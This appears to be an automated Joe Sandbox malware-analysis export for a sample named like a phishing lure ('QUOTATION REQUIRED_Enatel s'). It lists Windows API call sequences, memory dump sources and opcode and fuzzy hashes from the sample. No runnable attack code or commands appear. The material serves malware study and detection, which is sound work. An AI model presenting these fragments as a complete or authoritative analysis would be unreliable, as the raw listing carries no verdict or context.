• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Window$ForegroundPixelRelease
• String ID:
• API String ID: 4156661090-0
• Opcode ID: b66e8f5ba544e34b1cf784b174406b627802648fc147fb2ad11c51d62642cb6e
• Instruction ID: 26b83ae87862b5fb90742f45bf63d1f40caa79a1eda658204330e16c3e6bb1b7
• Opcode Fuzzy Hash: b66e8f5ba544e34b1cf784b174406b627802648fc147fb2ad11c51d62642cb6e
• Instruction Fuzzy Hash: B3218176A00204AFD714EF65CD84AAEBBE9EF45700F048468F84AA7352DB34AC44EB90

APIs
• GetEnvironmentStringsW.KERNEL32 ref: 00F4CDC6
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F4CDE9
  • Part of subcall function 00F43820: RtlAllocateHeap.NTDLL(00000000,?,00FE1444,?,00F2FDF5,?,?,00F1A976,00000010,00FE1440,00F113FC,?,00F113C6,?,00F11129), ref: 00F43852
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00F4CE0F
• _free.LIBCMT ref: 00F4CE22
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F4CE31
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
• Opcode ID: 85648a8806a2743cc8dc5c537153505337f9f3f185867c8ecfcc9f03578612a0
• Instruction ID: 41074dd1cd0757a4f790f1cc15a6f444036199b4fdc9b0b00c856fbe0c46217c
• Opcode Fuzzy Hash: 85648a8806a2743cc8dc5c537153505337f9f3f185867c8ecfcc9f03578612a0
• Instruction Fuzzy Hash: 1F0184B2A032157F276116BA6C88D7B7D6DDEC7BA13151129FD05C7201EF658D02B1F0

APIs
• ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F29693
• SelectObject.GDI32(?,00000000), ref: 00F296A2
• BeginPath.GDI32(?), ref: 00F296B9
• SelectObject.GDI32(?,00000000), ref: 00F296E2
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
• Opcode ID: 86700862888fca113c41d52e5d746c544debb63ab0d19de01798345e74af7ae7
• Instruction ID: 411f6a8312757a394197a6f9af92c88b46740d7aa8e383558d9af57e4044ac8d
• Opcode Fuzzy Hash: 86700862888fca113c41d52e5d746c544debb63ab0d19de01798345e74af7ae7
• Instruction Fuzzy Hash: D1219F71806359EFDB119F26EC88BAD3FA8BB01365F104216F410AB1B2D3B49895FF90

APIs
• SetTextColor.GDI32(?,?), ref: 00F298D6
• SetBkMode.GDI32(?,00000001), ref: 00F298E9
• GetStockObject.GDI32(00000005), ref: 00F298F1
• GetWindowLongW.USER32(?,000000EB), ref: 00F29952
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: ColorLongModeObjectStockTextWindow
• String ID:
• API String ID: 2960364272-0
• Opcode ID: 2c186ea271cc2be81221c996690c41a3743c403770fb3fcbd4d96e4f86db0c3d
• Instruction ID: 408cd86b72a05038e461d57a92fb65aa51a2d4f4b46049afc125b540a44da212
• Opcode Fuzzy Hash: 2c186ea271cc2be81221c996690c41a3743c403770fb3fcbd4d96e4f86db0c3d
• Instruction Fuzzy Hash: 3C1127B29492649FC7218B75FC59BFA3B60AB53331F08015DE5924B1E2C7B14980FB51

APIs
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memcmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2931989736-0
                                                                                                                    • Opcode ID: 87f8128c48d2025ab1485b1a7721110376880ad48551ea9c12f9cc0cc5bee0f0
                                                                                                                    • Instruction ID: 5aed0b1e3391286456e0d0b589c728bc4d72cc8b5c57d1d38200ae0b7fc92490
                                                                                                                    • Opcode Fuzzy Hash: 87f8128c48d2025ab1485b1a7721110376880ad48551ea9c12f9cc0cc5bee0f0
                                                                                                                    • Instruction Fuzzy Hash: 94019BA6A4160DFA920C55119D82FBA735D9B617B4F008026FD085E141F7A5EE15B2A2
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(?,?,?,00F3F2DE,00F43863,00FE1444,?,00F2FDF5,?,?,00F1A976,00000010,00FE1440,00F113FC,?,00F113C6), ref: 00F42DFD
                                                                                                                    • _free.LIBCMT ref: 00F42E32
                                                                                                                    • _free.LIBCMT ref: 00F42E59
                                                                                                                    • SetLastError.KERNEL32(00000000,00F11129), ref: 00F42E66
                                                                                                                    • SetLastError.KERNEL32(00000000,00F11129), ref: 00F42E6F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3170660625-0
                                                                                                                    • Opcode ID: 8f9b10e10a50b80693da3a925e3f2a1a9219512759c22633736df5d7ef15236d
                                                                                                                    • Instruction ID: 7ba15035ea4806dd112f55e5248e1474d5c6bd0ee2c1443230da4b0be6eea1b9
                                                                                                                    • Opcode Fuzzy Hash: 8f9b10e10a50b80693da3a925e3f2a1a9219512759c22633736df5d7ef15236d
                                                                                                                    • Instruction Fuzzy Hash: DB01F47360560577CA5267356C85E2B3E6AABD27B1BE40039FC25E2292EE78CC01B160
                                                                                                                    APIs
                                                                                                                    • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F6FF41,80070057,?,?,?,00F7035E), ref: 00F7002B
                                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F6FF41,80070057,?,?), ref: 00F70046
                                                                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F6FF41,80070057,?,?), ref: 00F70054
                                                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F6FF41,80070057,?), ref: 00F70064
                                                                                                                    • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F6FF41,80070057,?,?), ref: 00F70070
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3897988419-0
                                                                                                                    • Opcode ID: 85d3f2b8bec18a42c550c8d08ee60faca53b7ac2ea329748e3ff2ae6ff992c55
                                                                                                                    • Instruction ID: 1eb50bf0f5d4d73285e88ad96496c7834600d3996495e4ceb542f2330adf5cb1
                                                                                                                    • Opcode Fuzzy Hash: 85d3f2b8bec18a42c550c8d08ee60faca53b7ac2ea329748e3ff2ae6ff992c55
                                                                                                                    • Instruction Fuzzy Hash: 680162B6600218FFDB114F69DC44BAA7BEDEF48761F148125F909D6210DB75DD40ABA0
                                                                                                                    APIs
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00F7E997
                                                                                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 00F7E9A5
                                                                                                                    • Sleep.KERNEL32(00000000), ref: 00F7E9AD
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00F7E9B7
                                                                                                                    • Sleep.KERNEL32 ref: 00F7E9F3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2833360925-0
                                                                                                                    • Opcode ID: 4e1446b989289b147cc530fe67f2d67243ec06d62574a44aad26b8968f3e41cd
                                                                                                                    • Instruction ID: 69cc7b2f040950127488b629c47487795b5a85a47c5ac893335cb760cc756d90
                                                                                                                    • Opcode Fuzzy Hash: 4e1446b989289b147cc530fe67f2d67243ec06d62574a44aad26b8968f3e41cd
                                                                                                                    • Instruction Fuzzy Hash: 83015B72D0152DDBCF009BE5DC49ADDBB78BF0E311F004587E606B2241CB349555EBA2
                                                                                                                    APIs
                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F71114
                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,00F70B9B,?,?,?), ref: 00F71120
                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00F70B9B,?,?,?), ref: 00F7112F
                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00F70B9B,?,?,?), ref: 00F71136
                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F7114D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 842720411-0
                                                                                                                    • Opcode ID: 42a40c6086b1d7df6323914cc7d8a116a281fae3dbe77d5130e378dd8b944160
                                                                                                                    • Instruction ID: cc4c14f8e76c3580c2846b5220419e4f45812e9d3d1d180a4dd7f0e002b344f2
                                                                                                                    • Opcode Fuzzy Hash: 42a40c6086b1d7df6323914cc7d8a116a281fae3dbe77d5130e378dd8b944160
                                                                                                                    • Instruction Fuzzy Hash: C9011DB5600209BFDB114F69DC49A6A3B7EFF86360B514415FA45D7360DA71DD00AAA0
                                                                                                                    APIs
                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F70FCA
                                                                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F70FD6
                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F70FE5
                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F70FEC
                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F71002
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 44706859-0
                                                                                                                    • Opcode ID: f6c3189d5c388aef546c6b85cdbb31916e3f24bff07c008cbd039e73502fae85
                                                                                                                    • Instruction ID: b54090c9b3b2404fbe9083f903c4f8bc3ee802731c4e1c94d6b32b2319304def
                                                                                                                    • Opcode Fuzzy Hash: f6c3189d5c388aef546c6b85cdbb31916e3f24bff07c008cbd039e73502fae85
                                                                                                                    • Instruction Fuzzy Hash: 1CF049B5600309ABDB214FA99C49F563BADFF8A762F108415FA49C6251DE70DC50AAA0
                                                                                                                    APIs
                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F7102A
                                                                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F71036
                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F71045
                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F7104C
                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F71062
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 44706859-0
                                                                                                                    • Opcode ID: 5398ae3fd9ff69d3dc32c5f153b3a51f63a2c0b5a970c417986b46fe5d0f9e69
                                                                                                                    • Instruction ID: b3d88f11d848e15bfabe97d25e6d087f77d428f8ce63bf1498bc72fc45595187
                                                                                                                    • Opcode Fuzzy Hash: 5398ae3fd9ff69d3dc32c5f153b3a51f63a2c0b5a970c417986b46fe5d0f9e69
                                                                                                                    • Instruction Fuzzy Hash: 60F06DB5200309FBDB215FA9EC49F563BAEFF8A761F104415FA49C7251DE70D850AAA0
                                                                                                                    APIs
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00F8017D,?,00F832FC,?,00000001,00F52592,?), ref: 00F80324
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00F8017D,?,00F832FC,?,00000001,00F52592,?), ref: 00F80331
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00F8017D,?,00F832FC,?,00000001,00F52592,?), ref: 00F8033E
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00F8017D,?,00F832FC,?,00000001,00F52592,?), ref: 00F8034B
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00F8017D,?,00F832FC,?,00000001,00F52592,?), ref: 00F80358
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00F8017D,?,00F832FC,?,00000001,00F52592,?), ref: 00F80365
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2962429428-0
                                                                                                                    • Opcode ID: 778dc5edcca292fe31013cd125f31b345bd00eb54986f735c76098a1f0881679
                                                                                                                    • Instruction ID: 41e66d9c761bb7403246ecb94612fbac51a28a2e9c6afd31078bac300a380d33
                                                                                                                    • Opcode Fuzzy Hash: 778dc5edcca292fe31013cd125f31b345bd00eb54986f735c76098a1f0881679
                                                                                                                    • Instruction Fuzzy Hash: 6401AE72801B15DFCB30AF66D880852FBF9BF603253558A3FD19652931CBB1A958EF80
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00F4D752
                                                                                                                      • Part of subcall function 00F429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F4D7D1,00000000,00000000,00000000,00000000,?,00F4D7F8,00000000,00000007,00000000,?,00F4DBF5,00000000), ref: 00F429DE
                                                                                                                      • Part of subcall function 00F429C8: GetLastError.KERNEL32(00000000,?,00F4D7D1,00000000,00000000,00000000,00000000,?,00F4D7F8,00000000,00000007,00000000,?,00F4DBF5,00000000,00000000), ref: 00F429F0
                                                                                                                    • _free.LIBCMT ref: 00F4D764
                                                                                                                    • _free.LIBCMT ref: 00F4D776
                                                                                                                    • _free.LIBCMT ref: 00F4D788
                                                                                                                    • _free.LIBCMT ref: 00F4D79A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    • Opcode ID: 99b6dc2da6d8c8b103387ca1bd3ce904ad30d6db63cdd09287d5ee191e88867e
                                                                                                                    • Instruction ID: 6bdfd334b1148a894749ceb9afe35ba0d1628fe32c70232285b7df720c2c6c9e
                                                                                                                    • Opcode Fuzzy Hash: 99b6dc2da6d8c8b103387ca1bd3ce904ad30d6db63cdd09287d5ee191e88867e
                                                                                                                    • Instruction Fuzzy Hash: D4F01232945209AB9665EB69FDC5C167FEEBB447207D40C16F848D7501C734FC80B6A4
                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00F75C58
                                                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00F75C6F
                                                                                                                    • MessageBeep.USER32(00000000), ref: 00F75C87
                                                                                                                    • KillTimer.USER32(?,0000040A), ref: 00F75CA3
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00F75CBD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3741023627-0
                                                                                                                    • Opcode ID: d9531f6a0ef2554f504a5a180bb44618de314dc33dd3e95b9c6eee6d67b49cbb
                                                                                                                    • Instruction ID: 6f1d2a870e4f9506a7a706ac398825199432af573d7e86e520111465300e9db1
                                                                                                                    • Opcode Fuzzy Hash: d9531f6a0ef2554f504a5a180bb44618de314dc33dd3e95b9c6eee6d67b49cbb
                                                                                                                    • Instruction Fuzzy Hash: 4801A970500B08ABEB219B20DD4EFA677B8BF01F05F04455AB587A11E1DBF4A994EFD1
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00F422BE
                                                                                                                      • Part of subcall function 00F429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00F4D7D1,00000000,00000000,00000000,00000000,?,00F4D7F8,00000000,00000007,00000000,?,00F4DBF5,00000000), ref: 00F429DE
                                                                                                                      • Part of subcall function 00F429C8: GetLastError.KERNEL32(00000000,?,00F4D7D1,00000000,00000000,00000000,00000000,?,00F4D7F8,00000000,00000007,00000000,?,00F4DBF5,00000000,00000000), ref: 00F429F0
                                                                                                                    • _free.LIBCMT ref: 00F422D0
                                                                                                                    • _free.LIBCMT ref: 00F422E3
                                                                                                                    • _free.LIBCMT ref: 00F422F4
                                                                                                                    • _free.LIBCMT ref: 00F42305
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 776569668-0
                                                                                                                    • Opcode ID: bee3a393de9961fc1f7995477c0bd5a6870adb9d79605d313cb3508eb05eed34
                                                                                                                    • Instruction ID: c8e76a838b4bc0aa0b08bf3240b5546a28a9261e68bc3f193f9962ec1af7b58d
                                                                                                                    • Opcode Fuzzy Hash: bee3a393de9961fc1f7995477c0bd5a6870adb9d79605d313cb3508eb05eed34
